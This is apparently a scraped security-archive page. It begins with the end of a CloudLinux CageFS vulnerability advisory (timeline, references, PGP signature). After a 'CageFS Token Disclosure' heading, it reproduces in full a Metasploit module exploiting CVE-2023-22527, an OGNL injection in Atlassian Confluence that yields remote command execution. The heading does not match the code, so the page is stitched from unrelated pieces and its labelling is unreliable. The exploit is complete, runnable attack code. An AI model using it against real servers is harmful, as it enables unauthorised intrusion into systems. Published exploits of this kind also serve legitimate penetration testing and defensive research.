* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-09-02`: vendor released version 7.1.2-2 to testing  
* `2020-09-28`: vendor released version 7.1.2-2 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36771  
* `2024-01-25`: public disclosure

## References ##

* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem>  
* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated>  
* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3  
dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D  
5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ  
DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u  
Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R  
pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6  
BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P  
oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26  
b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer  
M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE  
cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6  
hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=  
=d1f0  
-----END PGP SIGNATURE-----

CloudLinux CageFS 7.1.1-1 Token Disclosure

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence SSTI Injection',        'Description' => %q{          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses          the injection to evaluate an OGNL expression resulting in OS command execution.          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.        },        'Author' => [          'Rahul Maini', # ProjectDiscovery analysis          'Harsh Jaiswal', # ProjectDiscovery analysis          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-22527'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']        ],        'DisclosureDate' => '2024-01-16', # Atlassian advisory released        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8090        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def get_confluence_platform    # this method gets the platform by exploiting CVE-2023-22527    return @confluence_platform if @confluence_platform    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      @org.apache.struts2.ServletActionContext@getResponse().setHeader(        '#{header}',        (@java.lang.System@getProperty('os.name'))      )    OGNL    res = inject_ognl(ognl)    return nil unless res    res.headers[header]  end  def check    confluence_version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version    vprint_status("Detected Confluence version: #{confluence_version}")    if confluence_version > Rex::Version.new('8.5.3')      return CheckCode::Safe("Version #{confluence_version} is not affected.")    end    confluence_platform = get_confluence_platform    unless confluence_platform      return CheckCode::Safe('Failed to test OGNL injection.')    end    vprint_status("Detected target platform: #{confluence_platform}")    CheckCode::Vulnerable('Successfully tested OGNL injection.')  end  def exploit    confluence_platform = get_confluence_platform    unless confluence_platform      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')    end    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")    end    print_status("Executing #{payload_instance.refname} (#{target.name})")    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    param = rand_text_alphanumeric(6..10)    # reference a parameter in the OGNL to work around the 200 character length limit    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      (new freemarker.template.utility.Execute()).exec(        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}      )    OGNL    if target['Platform'] == 'win'      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }    else      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }    end    inject_ognl(ognl, 'vars_post' => vars_post)  end  def inject_ognl(ognl, opts = {})    opts = opts.clone    param = rand_text_alphanumeric(6..10)    final_opts = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),      'vars_post' => {        # label and param are both limited to a 200 character length by default        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",        param => ognl      }.merge(opts.delete('vars_post') || {})    }.merge(opts)    send_request_cgi(final_opts)  endend

Tag

#linux